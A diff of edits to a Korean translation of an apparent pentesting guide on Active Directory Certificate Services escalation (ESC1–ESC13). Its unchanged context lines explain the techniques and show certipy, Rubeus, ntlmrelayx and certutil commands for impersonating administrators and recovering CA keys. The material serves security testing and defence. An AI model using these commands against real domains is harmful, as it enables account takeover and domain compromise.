 - **요청자가 인증서 서명 요청 (CSR)에 subjectAltName을 포함할 수 있는 능력이 템플릿에 의해 허용됩니다:**
 - Active Directory (AD)는 인증을 위해 인증서에서 subjectAltName (SAN)을 우선시합니다. 이는 CSR에서 SAN을 지정함으로써 인증서를 요청하여 어떤 사용자(예: 도메인 관리자)를 가장할 수 있음을 의미합니다. 요청자가 SAN을 지정할 수 있는지는 인증서 템플릿의 AD 객체에서 `mspki-certificate-name-flag` 속성을 통해 표시됩니다. 이 속성은 비트마스크이며, `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` 플래그가 존재하면 요청자가 SAN을 지정할 수 있습니다.
 
 > [!CAUTION]
-> 설명된 구성은 낮은 권한의 사용자가 선택한 SAN으로 인증서를 요청할 수 있도록 하여 Kerberos 또는 SChannel을 통해 어떤 도메인 주체로도 인증할 수 있게 합니다.
+> 설명된 구성은 낮은 권한의 사용자가 선택한 SAN으로 인증서를 요청할 수 있도록 허용하여 Kerberos 또는 SChannel을 통해 어떤 도메인 주체로도 인증할 수 있게 합니다.
 
 이 기능은 때때로 HTTPS 또는 호스트 인증서의 즉석 생성 지원을 위해 제품이나 배포 서비스에 의해 활성화되거나 이해 부족으로 인해 활성화됩니다.
 
@@ -65,11 +65,11 @@ AD 포리스트의 구성 스키마 내에서 인증서 템플릿을 열거하
 4. 인증서 템플릿에 대한 지나치게 관대한 보안 설명자가 저권한 사용자에게 인증서 등록 권한을 부여합니다.
 5. **인증서 템플릿은 Any Purpose EKU 또는 EKU가 없는 것으로 정의됩니다.**
 
-**Any Purpose EKU**는 공격자가 **모든 목적**을 위해 인증서를 얻을 수 있도록 허용하며, 여기에는 클라이언트 인증, 서버 인증, 코드 서명 등이 포함됩니다. **ESC3에 사용된 동일한 기술**이 이 시나리오를 악용하는 데 사용될 수 있습니다.
+**Any Purpose EKU**는 공격자가 **모든 목적**을 위해 인증서를 얻을 수 있도록 허용하며, 여기에는 클라이언트 인증, 서버 인증, 코드 서명 등이 포함됩니다. **ESC3에 사용된 동일한 기술**을 사용하여 이 시나리오를 악용할 수 있습니다.
 
-**EKU가 없는** 인증서는 하위 CA 인증서로 작용하며, **모든 목적**을 위해 악용될 수 있으며 **새 인증서를 서명하는 데도 사용될 수 있습니다**. 따라서 공격자는 하위 CA 인증서를 활용하여 새 인증서에 임의의 EKU 또는 필드를 지정할 수 있습니다.
+**EKU가 없는** 인증서는 하위 CA 인증서로 작용하며, **모든 목적**을 위해 악용될 수 있으며 **새로운 인증서에 서명하는 데에도 사용될 수 있습니다**. 따라서 공격자는 하위 CA 인증서를 활용하여 새로운 인증서에 임의의 EKU 또는 필드를 지정할 수 있습니다.
 
-그러나 **도메인 인증**을 위해 생성된 새 인증서는 하위 CA가 **`NTAuthCertificates`** 객체에 의해 신뢰되지 않는 경우 작동하지 않습니다. 이는 기본 설정입니다. 그럼에도 불구하고 공격자는 여전히 **모든 EKU**와 임의의 인증서 값을 가진 **새 인증서**를 생성할 수 있습니다. 이러한 인증서는 잠재적으로 **다양한 목적**(예: 코드 서명, 서버 인증 등)으로 **남용될 수** 있으며, SAML, AD FS 또는 IPSec과 같은 네트워크의 다른 애플리케이션에 중대한 영향을 미칠 수 있습니다.
+그러나 **도메인 인증**을 위해 생성된 새로운 인증서는 하위 CA가 **`NTAuthCertificates`** 객체에 의해 신뢰되지 않는 경우 작동하지 않습니다. 이는 기본 설정입니다. 그럼에도 불구하고 공격자는 여전히 **임의의 EKU**와 임의의 인증서 값을 가진 **새로운 인증서**를 생성할 수 있습니다. 이러한 인증서는 잠재적으로 **다양한 목적**(예: 코드 서명, 서버 인증 등)으로 **남용될 수** 있으며, SAML, AD FS 또는 IPSec과 같은 네트워크의 다른 애플리케이션에 중대한 영향을 미칠 수 있습니다.
 
 AD Forest의 구성 스키마 내에서 이 시나리오와 일치하는 템플릿을 나열하기 위해 다음 LDAP 쿼리를 실행할 수 있습니다:
 ```
@@ -81,9 +81,9 @@ AD Forest의 구성 스키마 내에서 이 시나리오와 일치하는 템플
 
 이 시나리오는 첫 번째와 두 번째와 비슷하지만 **다른 EKU** (인증서 요청 에이전트)를 **악용**하고 **2개의 다른 템플릿**을 사용합니다 (따라서 2세트의 요구 사항이 있습니다).
 
-**인증서 요청 에이전트 EKU** (OID 1.3.6.1.4.1.311.20.2.1)는 Microsoft 문서에서 **등록 에이전트**로 알려져 있으며, 주체가 **다른 사용자를 대신하여 인증서**에 **등록**할 수 있도록 허용합니다.
+**인증서 요청 에이전트 EKU** (OID 1.3.6.1.4.1.311.20.2.1)는 Microsoft 문서에서 **등록 에이전트**로 알려져 있으며, 주체가 **다른 사용자를 대신하여 인증서에 등록**할 수 있도록 허용합니다.
 
-**“등록 에이전트”**는 그러한 **템플릿**에 등록하고 결과로 생성된 **인증서를 사용하여 다른 사용자를 대신하여 CSR에 공동 서명**합니다. 그런 다음 **공동 서명된 CSR**을 CA에 **전송**하고, **“대신 등록”을 허용하는 템플릿**에 등록하며, CA는 **“다른” 사용자에게 속하는 인증서**로 응답합니다.
+**“등록 에이전트”**는 그러한 **템플릿**에 등록하고 결과적으로 생성된 **인증서를 사용하여 다른 사용자를 대신하여 CSR에 공동 서명**합니다. 그런 다음 **공동 서명된 CSR**을 CA에 **전송**하고, **“대신 등록”을 허용하는 템플릿**에 등록하며, CA는 **“다른” 사용자에게 속하는 인증서**로 응답합니다.
 
 **요구 사항 1:**
 
@@ -127,7 +127,7 @@ Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password
 
 **인증서 템플릿**에 대한 **보안 설명자**는 템플릿에 대해 특정 **AD 주체**가 보유한 **권한**을 정의합니다.
 
-**공격자**가 **템플릿**을 **변경**하고 **이전 섹션**에 설명된 **악용 가능한 잘못된 구성**을 **설치**할 수 있는 필수 **권한**을 보유하고 있다면, 권한 상승이 촉진될 수 있습니다.
+**공격자**가 **템플릿**을 **변경**하고 **이전 섹션**에서 설명된 **악용 가능한 잘못된 구성**을 **설치**할 수 있는 필수 **권한**을 보유하고 있다면, 권한 상승이 촉진될 수 있습니다.
 
 인증서 템플릿에 적용 가능한 주목할 만한 권한은 다음과 같습니다:
 
@@ -135,7 +135,7 @@ Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password
 - **전체 제어:** 객체에 대한 완전한 권한을 부여하며, 모든 속성을 변경할 수 있는 능력을 포함합니다.
 - **소유자 쓰기:** 공격자가 제어하는 주체로 객체의 소유자를 변경할 수 있도록 허용합니다.
 - **DACL 쓰기:** 접근 제어를 조정할 수 있도록 하여 공격자에게 전체 제어를 부여할 수 있습니다.
-- **속성 쓰기:** 모든 객체 속성을 편집할 수 있도록 권한을 부여합니다.
+- **속성 쓰기:** 모든 객체 속성을 편집할 수 있도록 허가합니다.
 
 ### 남용
 
@@ -143,7 +143,7 @@ Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password
 
 <figure><img src="../../../images/image (814).png" alt=""><figcaption></figcaption></figure>
 
-ESC4는 사용자가 인증서 템플릿에 대한 쓰기 권한을 가질 때 발생합니다. 예를 들어, 이는 인증서 템플릿의 구성을 덮어써서 템플릿을 ESC1에 취약하게 만들기 위해 악용될 수 있습니다.
+ESC4는 사용자가 인증서 템플릿에 대한 쓰기 권한을 가질 때 발생합니다. 이는 예를 들어 인증서 템플릿의 구성을 덮어써서 템플릿을 ESC1에 취약하게 만들기 위해 악용될 수 있습니다.
 
 위 경로에서 볼 수 있듯이, 오직 `JOHNPC`만 이러한 권한을 가지고 있지만, 우리의 사용자 `JOHN`은 `JOHNPC`에 대한 새로운 `AddKeyCredentialLink` 엣지를 가지고 있습니다. 이 기술이 인증서와 관련이 있기 때문에, 저는 이 공격을 구현했으며, 이는 [Shadow Credentials](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)로 알려져 있습니다. 피해자의 NT 해시를 검색하기 위한 Certipy의 `shadow auto` 명령의 작은 미리보기를 보여드립니다.
 ```bash
@@ -166,7 +166,7 @@ certipy template -username john@corp.local -password Passw0rd -template ESC4-Tes
 
 인증서 템플릿과 인증 기관을 넘어서는 여러 객체를 포함하는 ACL 기반 관계의 광범위한 웹은 전체 AD CS 시스템의 보안에 영향을 미칠 수 있습니다. 보안에 상당한 영향을 미칠 수 있는 이러한 객체는 다음과 같습니다:
 
-- CA 서버의 AD 컴퓨터 객체는 S4U2Self 또는 S4U2Proxy와 같은 메커니즘을 통해 손상될 수 있습니다.
+- S4U2Self 또는 S4U2Proxy와 같은 메커니즘을 통해 손상될 수 있는 CA 서버의 AD 컴퓨터 객체.
 - CA 서버의 RPC/DCOM 서버.
 - 특정 컨테이너 경로 `CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>` 내의 모든 하위 AD 객체 또는 컨테이너. 이 경로에는 인증서 템플릿 컨테이너, 인증 기관 컨테이너, NTAuthCertificates 객체 및 등록 서비스 컨테이너와 같은 컨테이너 및 객체가 포함되지만 이에 국한되지 않습니다.
 
@@ -176,9 +176,9 @@ certipy template -username john@corp.local -password Passw0rd -template ESC4-Tes
 
 ### 설명
 
-[**CQure Academy 포스트**](https://cqureacademy.com/blog/enhanced-key-usage)에서 논의된 주제는 Microsoft에서 설명한 **`EDITF_ATTRIBUTESUBJECTALTNAME2`** 플래그의 의미를 다룹니다. 이 구성은 인증 기관(CA)에서 활성화되면 **사용자 정의 값**을 **주체 대체 이름**에 포함할 수 있도록 허용합니다. 이는 Active Directory®에서 구성된 요청을 포함하여 **모든 요청**에 해당합니다. 결과적으로, 이 조항은 **침입자**가 도메인 **인증**을 위해 설정된 **모든 템플릿**을 통해 등록할 수 있도록 허용합니다. 특히, 표준 사용자 템플릿과 같이 **비권한** 사용자 등록이 가능한 템플릿이 이에 해당합니다. 결과적으로, 인증서를 확보하여 침입자가 도메인 관리자 또는 도메인 내의 **다른 활성 엔터티**로 인증할 수 있게 됩니다.
+[**CQure Academy 포스트**](https://cqureacademy.com/blog/enhanced-key-usage)에서 논의된 주제는 Microsoft에서 설명한 **`EDITF_ATTRIBUTESUBJECTALTNAME2`** 플래그의 의미를 다룹니다. 이 구성은 인증 기관(CA)에서 활성화되면 **모든 요청**에 대해 **사용자 정의 값**을 **주체 대체 이름**에 포함할 수 있도록 허용합니다. 따라서 이 조항은 **침입자**가 도메인 **인증**을 위해 설정된 **모든 템플릿**을 통해 등록할 수 있게 하며, 특히 표준 사용자 템플릿과 같이 **비권한** 사용자 등록이 가능한 템플릿에 대해 가능합니다. 결과적으로, 인증서를 확보하여 침입자가 도메인 관리자 또는 도메인 내의 **다른 활성 엔터티**로 인증할 수 있게 됩니다.
 
-**참고**: `certreq.exe`에서 `-attrib "SAN:"` 인수를 통해 인증서 서명 요청(CSR)에 **대체 이름**을 추가하는 방법은 ESC1의 SAN 악용 전략과 **대조**를 이룹니다. 여기서의 차이는 **계정 정보가 캡슐화되는 방식**에 있습니다—확장 대신 인증서 속성 내에 있습니다.
+**참고**: `certreq.exe`에서 `-attrib "SAN:"` 인수를 통해 인증서 서명 요청(CSR)에 **대체 이름**을 추가하는 방법은 ESC1의 SAN 악용 전략과 **대조**를 이룹니다. 여기서의 차이는 **계정 정보가 캡슐화되는 방식**에 있으며, 확장 대신 인증서 속성 내에 포함됩니다.
 
 ### 남용
 
@@ -203,12 +203,12 @@ certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target
 ```bash
 certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
 ```
-이 구성을 비활성화하려면, 플래그를 다음과 같이 제거할 수 있습니다:
+이 구성을 귀하의 환경에서 비활성화하려면, 플래그를 다음과 같이 제거할 수 있습니다:
 ```bash
 certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2
 ```
 > [!WARNING]
-> 2022년 5월 보안 업데이트 이후, 새로 발급된 **certificates**는 **requester's `objectSid` property**를 포함하는 **security extension**을 포함합니다. ESC1의 경우, 이 SID는 지정된 SAN에서 파생됩니다. 그러나 **ESC6**의 경우, SID는 **requester's `objectSid`**를 반영하며, SAN이 아닙니다.\
+> 2022년 5월 보안 업데이트 이후, 새로 발급된 **certificates**는 **requester's `objectSid` property**를 포함하는 **security extension**을 포함합니다. ESC1의 경우, 이 SID는 지정된 SAN에서 파생됩니다. 그러나 **ESC6**의 경우, SID는 **requester's `objectSid`**를 반영하며, SAN은 반영하지 않습니다.\
 > ESC6를 악용하기 위해서는 시스템이 ESC10(Weak Certificate Mappings)에 취약해야 하며, 이는 **새로운 security extension**보다 **SAN**을 우선시합니다.
 
 ## 취약한 인증서 기관 접근 제어 - ESC7
@@ -225,11 +225,11 @@ Get-CertificationAuthority -ComputerName dc.domain.local | Get-CertificationAuth
 
 #### 남용
 
-인증 기관에서 **`ManageCA`** 권한을 가지면 주체가 PSPKI를 사용하여 원격으로 설정을 조작할 수 있습니다. 여기에는 SAN 사양을 모든 템플릿에서 허용하기 위해 **`EDITF_ATTRIBUTESUBJECTALTNAME2`** 플래그를 전환하는 것이 포함되며, 이는 도메인 상승의 중요한 측면입니다.
+인증 기관에서 **`ManageCA`** 권한을 보유하면 주체가 PSPKI를 사용하여 원격으로 설정을 조작할 수 있습니다. 여기에는 SAN 사양을 모든 템플릿에서 허용하기 위해 **`EDITF_ATTRIBUTESUBJECTALTNAME2`** 플래그를 전환하는 것이 포함되며, 이는 도메인 상승의 중요한 측면입니다.
 
 이 프로세스의 단순화는 PSPKI의 **Enable-PolicyModuleFlag** cmdlet을 사용하여 직접 GUI 상호작용 없이 수정할 수 있습니다.
 
-**`ManageCertificates`** 권한을 소유하면 보류 중인 요청을 승인할 수 있어 "CA 인증서 관리자 승인" 보호 장치를 효과적으로 우회할 수 있습니다.
+**`ManageCertificates`** 권한을 보유하면 보류 중인 요청을 승인할 수 있어 "CA 인증서 관리자 승인" 보호 장치를 효과적으로 우회할 수 있습니다.
 
 **Certify** 및 **PSPKI** 모듈의 조합을 사용하여 인증서를 요청, 승인 및 다운로드할 수 있습니다:
 ```powershell
@@ -287,7 +287,7 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
 ```
 이 공격을 위한 전제 조건을 충족했다면, **`SubCA` 템플릿을 기반으로 인증서를 요청하는 것**부터 시작할 수 있습니다.
 
-**이 요청은 거부될 것입니다**, 하지만 우리는 개인 키를 저장하고 요청 ID를 기록해 두겠습니다.
+**이 요청은 거부될 것입니다**, 하지만 우리는 개인 키를 저장하고 요청 ID를 기록할 것입니다.
 ```bash
 certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target ca.corp.local -template SubCA -upn administrator@corp.local
 Certipy v4.0.0 - by Oliver Lyak (ly4k)
@@ -323,14 +323,14 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
 ### Explanation
 
 > [!NOTE]
-> **AD CS가 설치된** 환경에서, **취약한 웹 등록 엔드포인트**가 존재하고 **도메인 컴퓨터 등록 및 클라이언트 인증**을 허용하는 **인증서 템플릿이 게시**된 경우(예: 기본 **`Machine`** 템플릿), **스풀러 서비스가 활성화된 모든 컴퓨터가 공격자에 의해 손상될 수 있습니다**!
+> **AD CS가 설치된** 환경에서, **웹 등록 엔드포인트가 취약**하고 적어도 하나의 **인증서 템플릿이 게시**되어 **도메인 컴퓨터 등록 및 클라이언트 인증**을 허용하는 경우(기본 **`Machine`** 템플릿과 같은), **스풀러 서비스가 활성화된 모든 컴퓨터가 공격자에 의해 손상될 수 있습니다**!
 
-AD CS는 관리자가 설치할 수 있는 추가 서버 역할을 통해 제공되는 여러 **HTTP 기반 등록 방법**을 지원합니다. HTTP 기반 인증서 등록을 위한 이러한 인터페이스는 **NTLM 릴레이 공격**에 취약합니다. 공격자는 **손상된 머신에서, 인바운드 NTLM을 통해 인증하는 모든 AD 계정을 가장할 수 있습니다**. 피해자 계정을 가장하는 동안, 이러한 웹 인터페이스는 공격자가 **`User` 또는 `Machine` 인증서 템플릿을 사용하여 클라이언트 인증서 요청**을 할 수 있도록 접근할 수 있습니다.
+AD CS는 관리자가 설치할 수 있는 추가 서버 역할을 통해 제공되는 여러 **HTTP 기반 등록 방법**을 지원합니다. HTTP 기반 인증서 등록을 위한 이러한 인터페이스는 **NTLM 릴레이 공격**에 취약합니다. 공격자는 **손상된 머신에서, 인바운드 NTLM을 통해 인증하는 모든 AD 계정을 가장할 수 있습니다**. 피해자 계정을 가장하는 동안, 공격자는 이러한 웹 인터페이스에 접근하여 **`User` 또는 `Machine` 인증서 템플릿을 사용하여 클라이언트 인증서 요청**을 할 수 있습니다.
 
-- **웹 등록 인터페이스**(`http://<caserver>/certsrv/`에 있는 오래된 ASP 애플리케이션)는 기본적으로 HTTP만 지원하며, NTLM 릴레이 공격에 대한 보호를 제공하지 않습니다. 또한, Authorization HTTP 헤더를 통해 NTLM 인증만 명시적으로 허용하여 Kerberos와 같은 더 안전한 인증 방법을 적용할 수 없게 만듭니다.
+- **웹 등록 인터페이스**(`http://<caserver>/certsrv/`에서 사용할 수 있는 오래된 ASP 애플리케이션)는 기본적으로 HTTP만 지원하며, NTLM 릴레이 공격에 대한 보호를 제공하지 않습니다. 또한, Authorization HTTP 헤더를 통해 NTLM 인증만 명시적으로 허용하여 Kerberos와 같은 더 안전한 인증 방법을 적용할 수 없게 만듭니다.
 - **인증서 등록 서비스**(CES), **인증서 등록 정책**(CEP) 웹 서비스 및 **네트워크 장치 등록 서비스**(NDES)는 기본적으로 Authorization HTTP 헤더를 통해 협상 인증을 지원합니다. 협상 인증은 **Kerberos와 NTLM**을 모두 지원하여 공격자가 릴레이 공격 중에 **NTLM으로 다운그레이드**할 수 있게 합니다. 이러한 웹 서비스는 기본적으로 HTTPS를 활성화하지만, HTTPS만으로는 **NTLM 릴레이 공격으로부터 보호되지 않습니다**. HTTPS 서비스에 대한 NTLM 릴레이 공격으로부터의 보호는 HTTPS가 채널 바인딩과 결합될 때만 가능합니다. 불행히도, AD CS는 IIS에서 채널 바인딩에 필요한 인증에 대한 확장 보호를 활성화하지 않습니다.
 
-NTLM 릴레이 공격의 일반적인 **문제**는 **NTLM 세션의 짧은 지속 시간**과 공격자가 **NTLM 서명을 요구하는 서비스와 상호작용할 수 없는** 것입니다.
+NTLM 릴레이 공격의 일반적인 **문제**는 **NTLM 세션의 짧은 지속 시간**과 공격자가 **NTLM 서명을 요구하는 서비스와 상호작용할 수 없는 것**입니다.
 
 그럼에도 불구하고, 이 제한은 NTLM 릴레이 공격을 이용하여 사용자의 인증서를 획득함으로써 극복됩니다. 인증서의 유효 기간이 세션의 지속 시간을 결정하며, 인증서는 **NTLM 서명을 요구하는 서비스와 함께 사용될 수 있습니다**. 도난당한 인증서를 사용하는 방법에 대한 지침은 다음을 참조하십시오:
 
@@ -338,7 +338,7 @@ NTLM 릴레이 공격의 일반적인 **문제**는 **NTLM 세션의 짧은 지
 account-persistence.md
 {{#endref}}
 
-NTLM 릴레이 공격의 또 다른 제한은 **공격자가 제어하는 머신이 피해자 계정에 의해 인증되어야 한다는 점**입니다. 공격자는 이 인증을 기다리거나 **강제로** 시도할 수 있습니다:
+NTLM 릴레이 공격의 또 다른 제한은 **공격자가 제어하는 머신이 피해자 계정에 의해 인증되어야 한다는 것**입니다. 공격자는 이 인증을 기다리거나 **강제로** 시도할 수 있습니다:
 
 {{#ref}}
 ../printers-spooler-service-abuse.md
@@ -397,9 +397,9 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
 ```
 ## No Security Extension - ESC9 <a href="#id-5485" id="id-5485"></a>
 
-### 설명
+### Explanation
 
-새로운 값 **`CT_FLAG_NO_SECURITY_EXTENSION`** (`0x80000`)은 **`msPKI-Enrollment-Flag`**에 대해 ESC9로 언급되며, 인증서에 **새로운 `szOID_NTDS_CA_SECURITY_EXT` 보안 확장**을 포함하는 것을 방지합니다. 이 플래그는 `StrongCertificateBindingEnforcement`가 `1`로 설정될 때(기본 설정) 관련성이 있으며, 이는 `2`로 설정된 경우와 대조됩니다. ESC9가 없으면 요구 사항이 변경되지 않기 때문에 Kerberos 또는 Schannel에 대한 더 약한 인증서 매핑이 악용될 수 있는 시나리오에서 그 중요성이 높아집니다(ESC10과 같이).
+새로운 값 **`CT_FLAG_NO_SECURITY_EXTENSION`** (`0x80000`)는 **`msPKI-Enrollment-Flag`**에 대해 ESC9로 언급되며, 인증서에 **새로운 `szOID_NTDS_CA_SECURITY_EXT` 보안 확장**을 포함하는 것을 방지합니다. 이 플래그는 `StrongCertificateBindingEnforcement`가 `1`로 설정될 때(기본 설정) 관련성이 있으며, 이는 `2`로 설정된 경우와 대조됩니다. ESC9가 없으면 요구 사항이 변경되지 않기 때문에 Kerberos 또는 Schannel에 대한 더 약한 인증서 매핑이 악용될 수 있는 시나리오에서 그 관련성이 높아집니다(ESC10 참조).
 
 이 플래그의 설정이 중요해지는 조건은 다음과 같습니다:
 
@@ -408,9 +408,9 @@ Certipy v4.0.0 - by Oliver Lyak (ly4k)
 - 인증서에 의해 클라이언트 인증 EKU가 지정됩니다.
 - 다른 계정을 손상시키기 위해 `GenericWrite` 권한이 사용 가능합니다.
 
-### 남용 시나리오
+### Abuse Scenario
 
-`John@corp.local`이 `Jane@corp.local`에 대해 `GenericWrite` 권한을 보유하고 있으며, `Administrator@corp.local`을 손상시키려는 목표가 있다고 가정합니다. `Jane@corp.local`이 등록할 수 있는 `ESC9` 인증서 템플릿은 `msPKI-Enrollment-Flag` 설정에서 `CT_FLAG_NO_SECURITY_EXTENSION` 플래그로 구성되어 있습니다.
+`John@corp.local`이 `Jane@corp.local`에 대해 `GenericWrite` 권한을 보유하고 있으며, `Administrator@corp.local`을 손상시키려는 목표를 가지고 있다고 가정해 보겠습니다. `Jane@corp.local`이 등록할 수 있는 `ESC9` 인증서 템플릿은 `msPKI-Enrollment-Flag` 설정에서 `CT_FLAG_NO_SECURITY_EXTENSION` 플래그로 구성되어 있습니다.
 
 처음에 `Jane`의 해시는 `John`의 `GenericWrite` 덕분에 Shadow Credentials를 사용하여 획득됩니다:
 ```bash
@@ -426,7 +426,7 @@ certipy account update -username John@corp.local -password Passw0rd! -user Jane
 ```bash
 certipy req -username jane@corp.local -hashes <hash> -ca corp-DC-CA -template ESC9
 ```
-인증서의 `userPrincipalName`이 `Administrator`를 반영하며 “object SID”가 없는 것으로 기록됩니다.
+인증서의 `userPrincipalName`이 “object SID” 없이 `Administrator`를 반영하는 것으로 기록됩니다.
 
 `Jane`의 `userPrincipalName`은 원래의 `Jane@corp.local`로 되돌려집니다:
 ```bash
@@ -513,7 +513,7 @@ certipy auth -pfx dc.pfx -dc-ip 172.16.126.128 -ldap-shell
 
 ### 설명
 
-CA 서버가 `IF_ENFORCEENCRYPTICERTREQUEST`로 구성되지 않은 경우, RPC 서비스 통해 서명 없이 NTLM 릴레이 공격을 수행할 수 있습니다. [여기에서 참조](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)합니다.
+CA 서버가 `IF_ENFORCEENCRYPTICERTREQUEST`로 구성되지 않은 경우, RPC 서비스를 통해 서명 없이 NTLM 릴레이 공격을 수행할 수 있습니다. [여기에서 참조](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/)합니다.
 
 `certipy`를 사용하여 `Enforce Encryption for Requests`가 비활성화되어 있는지 열거할 수 있으며, certipy는 `ESC11` 취약점을 표시합니다.
 ```bash
@@ -565,7 +565,7 @@ $ ntlmrelayx.py -t rpc://192.168.100.100 -rpc-mode ICPR -icpr-ca-name DC01-CA -s
 
 관리자는 인증 기관을 "Yubico YubiHSM2"와 같은 외부 장치에 저장하도록 설정할 수 있습니다.
 
-USB 장치가 CA 서버에 USB 포트를 통해 연결되거나 CA 서버가 가상 머신인 경우 USB 장치 서버가 연결된 경우, YubiHSM에서 키를 생성하고 활용하기 위해 인증 키(때때로 "비밀번호"라고도 함)가 필요합니다.
+USB 장치가 CA 서버에 USB 포트를 통해 연결되거나 CA 서버가 가상 머신인 경우 USB 장치 서버에 연결된 경우, YubiHSM에서 키를 생성하고 활용하기 위해 Key Storage Provider에 대한 인증 키(때때로 "비밀번호"라고도 함)가 필요합니다.
 
 이 키/비밀번호는 레지스트리의 `HKEY_LOCAL_MACHINE\SOFTWARE\Yubico\YubiHSM\AuthKeysetPassword`에 평문으로 저장됩니다.
 
@@ -573,7 +573,7 @@ Reference in [here](https://pkiblog.knobloch.info/esc12-shell-access-to-adcs-ca-
 
 ### Abuse Scenario
 
-CA의 개인 키가 물리적 USB 장치에 저장되어 있을 경우, 쉘 접근을 통해 키를 복구할 수 있습니다.
+CA의 개인 키가 물리적 USB 장치에 저장되어 있을 때 쉘 접근을 얻으면 키를 복구할 수 있습니다.
 
 먼저 CA 인증서를 얻어야 합니다(이는 공개적입니다) 그리고:
 ```cmd
@@ -589,7 +589,7 @@ $ certutil -csp "YubiHSM Key Storage Provider" -repairstore -user my <CA Common
 
 ### 설명
 
-`msPKI-Certificate-Policy` 속성은 인증서 템플릿에 발급 정책을 추가할 수 있게 해줍니다. 정책 발급을 담당하는 `msPKI-Enterprise-Oid` 객체는 PKI OID 컨테이너의 구성 명명 컨텍스트(CN=OID,CN=Public Key Services,CN=Services)에서 발견할 수 있습니다. 이 객체의 `msDS-OIDToGroupLink` 속성을 사용하여 정책을 AD 그룹에 연결할 수 있으며, 이를 통해 시스템은 인증서를 제시하는 사용자가 마치 그룹의 구성원인 것처럼 권한을 부여할 수 있습니다. [여기에서 참조](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53).
+`msPKI-Certificate-Policy` 속성은 인증서 템플릿에 발급 정책을 추가할 수 있게 해줍니다. 정책을 발급하는 책임이 있는 `msPKI-Enterprise-Oid` 객체는 PKI OID 컨테이너의 구성 명명 컨텍스트(CN=OID,CN=Public Key Services,CN=Services)에서 발견할 수 있습니다. 이 객체의 `msDS-OIDToGroupLink` 속성을 사용하여 정책을 AD 그룹에 연결할 수 있으며, 이를 통해 시스템은 인증서를 제시하는 사용자가 마치 그룹의 구성원인 것처럼 권한을 부여할 수 있습니다. [여기에서 참조](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53).
 
 다시 말해, 사용자가 인증서를 등록할 수 있는 권한이 있고 인증서가 OID 그룹에 연결되어 있을 때, 사용자는 이 그룹의 권한을 상속받을 수 있습니다.
 
@@ -629,12 +629,12 @@ certipy req -u "John@domain.local" -p "password" -dc-ip 192.168.100.100 -target
 
 ### 손상된 CA에 의한 포리스트 신뢰 파괴
 
-**교차 포리스트 등록**을 위한 구성은 상대적으로 간단하게 이루어집니다. **루트 CA 인증서**는 리소스 포리스트에서 관리자가 **계정 포리스트에 게시**하고, 리소스 포리스트의 **엔터프라이즈 CA** 인증서는 **각 계정 포리스트의 `NTAuthCertificates` 및 AIA 컨테이너에 추가**됩니다. 이 arrangement는 리소스 포리스트의 **CA가 PKI를 관리하는 모든 다른 포리스트에 대한 완전한 제어권**을 부여합니다. 만약 이 CA가 **공격자에 의해 손상된다면**, 리소스 및 계정 포리스트의 모든 사용자에 대한 인증서가 **그들에 의해 위조될 수 있으며**, 이로 인해 포리스트의 보안 경계가 파괴될 수 있습니다.
+**교차 포리스트 등록**을 위한 구성은 상대적으로 간단하게 이루어집니다. **루트 CA 인증서**는 리소스 포리스트에서 관리자가 **계정 포리스트에 게시**하고, 리소스 포리스트의 **엔터프라이즈 CA** 인증서는 **각 계정 포리스트의 `NTAuthCertificates` 및 AIA 컨테이너에 추가**됩니다. 이를 명확히 하자면, 이 구성은 **리소스 포리스트의 CA가 PKI를 관리하는 모든 다른 포리스트에 대한 완전한 제어 권한**을 부여합니다. 만약 이 CA가 **공격자에 의해 손상된다면**, 리소스 및 계정 포리스트의 모든 사용자에 대한 인증서가 **그들에 의해 위조될 수 있으며**, 이로 인해 포리스트의 보안 경계가 파괴될 수 있습니다.
 
 ### 외부 주체에게 부여된 등록 권한
 
 다중 포리스트 환경에서는 **인증된 사용자 또는 외부 주체**(엔터프라이즈 CA가 속한 포리스트 외부의 사용자/그룹)에게 **등록 및 편집 권한**을 허용하는 인증서 템플릿을 **게시하는 엔터프라이즈 CA**에 대해 주의가 필요합니다.\
-신뢰를 통해 인증이 이루어지면, **인증된 사용자 SID**가 AD에 의해 사용자의 토큰에 추가됩니다. 따라서 도메인에 **인증된 사용자 등록 권한을 허용하는 템플릿**이 있는 엔터프라이즈 CA가 존재하는 경우, **다른 포리스트의 사용자가 템플릿에 등록할 수 있는 가능성이** 있습니다. 마찬가지로, **템플릿에 의해 외부 주체에게 명시적으로 등록 권한이 부여되면**, **교차 포리스트 접근 제어 관계가 생성되어**, 한 포리스트의 주체가 **다른 포리스트의 템플릿에 등록할 수 있게 됩니다**.
+신뢰를 통해 인증이 이루어지면, **인증된 사용자 SID**가 AD에 의해 사용자의 토큰에 추가됩니다. 따라서 도메인에 **인증된 사용자 등록 권한을 허용하는 템플릿**이 있는 엔터프라이즈 CA가 있다면, **다른 포리스트의 사용자가 템플릿에 등록할 수 있는 가능성**이 있습니다. 마찬가지로, **템플릿에 의해 외부 주체에게 명시적으로 등록 권한이 부여된다면**, **교차 포리스트 접근 제어 관계가 생성되어**, 한 포리스트의 주체가 **다른 포리스트의 템플릿에 등록할 수 있게 됩니다**.
 
 두 시나리오는 한 포리스트에서 다른 포리스트로의 **공격 표면 증가**로 이어집니다. 인증서 템플릿의 설정은 공격자가 외부 도메인에서 추가 권한을 얻기 위해 악용될 수 있습니다.
 
